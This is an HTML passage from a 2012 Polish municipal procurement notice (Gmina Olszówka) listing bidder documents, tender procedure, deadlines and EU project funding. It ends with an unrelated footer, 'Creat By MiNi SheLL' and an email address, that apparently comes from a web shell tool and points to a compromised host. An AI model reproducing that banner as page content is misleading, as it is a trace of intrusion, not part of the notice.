<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, parafowany projekt umowy (załącznik Nr 2 siwz), pełnomocnictwo lub dokument umocowania prawnego osób składających oświadczenia (nie dotyczy osób fizycznych), kserokopie dokumentów potwierdzających posiadane wykształcenie i staż pracy, dla osób pracujących zaświadczenie od pracodawcy o dyspozycyjności.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olszowka.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Olszówce, Olszówka 15, 62-641 Olszówka, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:00, miejsce: Urząd Gminy w Olszówce, Olszówka 15, 62-641 Olszówka, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach projektu Szkoła z pasją współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com